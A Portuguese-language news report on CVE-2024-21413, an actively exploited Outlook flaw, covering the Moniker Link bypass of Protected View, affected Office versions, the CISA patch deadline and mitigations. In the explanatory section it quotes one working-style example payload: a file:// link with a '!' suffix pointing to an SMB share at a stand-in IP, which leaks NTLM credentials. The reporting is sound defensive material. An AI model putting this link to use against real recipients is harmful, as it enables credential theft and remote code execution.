Ameaça cibernética

Falha crítica no Outlook permite ataques RCE e é explorada ativamente

Uma falha de segurança no Microsoft Outlook, identificada como CVE-2024-21413, está sendo explorada em ataques ativos. A vulnerabilidade permite a execução remota de código, colocando sistemas em risco. A CISA alertou agências federais para aplicarem correções até 27 de fevereiro.

microsoft-outlook-atualizacoes-de-dezembro-acionam-alertas-de-seguranca-ics

A Agência de Segurança Cibernética e de Infraestrutura dos EUA (CISA) alertou sobre a exploração ativa de uma vulnerabilidade crítica no Microsoft Outlook, identificada como CVE-2024-21413. A falha, descoberta pelo pesquisador Haifei Li, da Check Point, permite a execução remota de código (RCE), comprometendo sistemas através de e-mails com links maliciosos.

Microsoft Outlook enfrenta falha crítica explorada em ataques RCE

novo-phishing-zerofont-faz-e-mails-maliciosos-parecerem-verificados-com-seguranca-pelas-ferramentas-de-seguranca-do-outlook

Como funciona a vulnerabilidade

O problema está relacionado à validação inadequada de entrada ao abrir e-mails que contêm links maliciosos. O erro permite que atacantes contornem o Modo de Exibição Protegido, uma camada de segurança que impede a execução de conteúdo prejudicial ao abrir arquivos do Office em modo somente leitura. Dessa forma, os arquivos são carregados diretamente no modo de edição, facilitando a execução de comandos maliciosos.

Além disso, o Painel de Visualização do Outlook também é um vetor de ataque, permitindo a exploração da falha apenas ao visualizar um documento malicioso.

A Check Point detalhou como hackers utilizam um método conhecido como Moniker Link para contornar as proteções do Outlook. Eles incorporam links maliciosos em e-mails usando o protocolo “file://” e adicionam um ponto de exclamação após a extensão do arquivo para enganar o sistema de segurança. Um exemplo disso seria:

<a href="file:///\\10.10.111.111\test\test.rtf!something">CLICK ME</a>

Dessa forma, arquivos do Office modificados podem ser explorados para roubo de credenciais NTLM e execução de código malicioso.

Produtos afetados e impacto

A falha impacta diversas versões do Microsoft Office, incluindo:

  • Microsoft Office LTSC 2021
  • Microsoft 365 Apps for Enterprise
  • Microsoft Outlook 2016
  • Microsoft Office 2019

Ataques bem-sucedidos explorando essa vulnerabilidade podem resultar na execução arbitrária de códigos maliciosos e roubo de credenciais, afetando empresas e usuários individuais.

Ação da CISA e recomendações

A CISA incluiu o CVE-2024-21413 em seu catálogo de Vulnerabilidades Exploradas Conhecidas (KEV) e determinou que agências federais dos EUA corrijam a falha até 27 de fevereiro, conforme a diretriz Binding Operational Directive (BOD) 22-01.

Para mitigar riscos, é recomendável:

  • Aplicar as correções de segurança disponibilizadas pela Microsoft.
  • Desativar o Painel de Visualização no Outlook.
  • Restringir o uso do protocolo “file://” em ambientes corporativos.
  • Monitorar atividades suspeitas relacionadas a documentos do Office.

Embora o alerta seja voltado para agências governamentais, empresas privadas também são fortemente recomendadas a aplicar as atualizações e reforçar suas medidas de segurança para evitar comprometimentos.

Com o aumento das ameaças cibernéticas, a aplicação rápida de patches e boas práticas de segurança são fundamentais para proteger sistemas e dados contra ataques em evolução.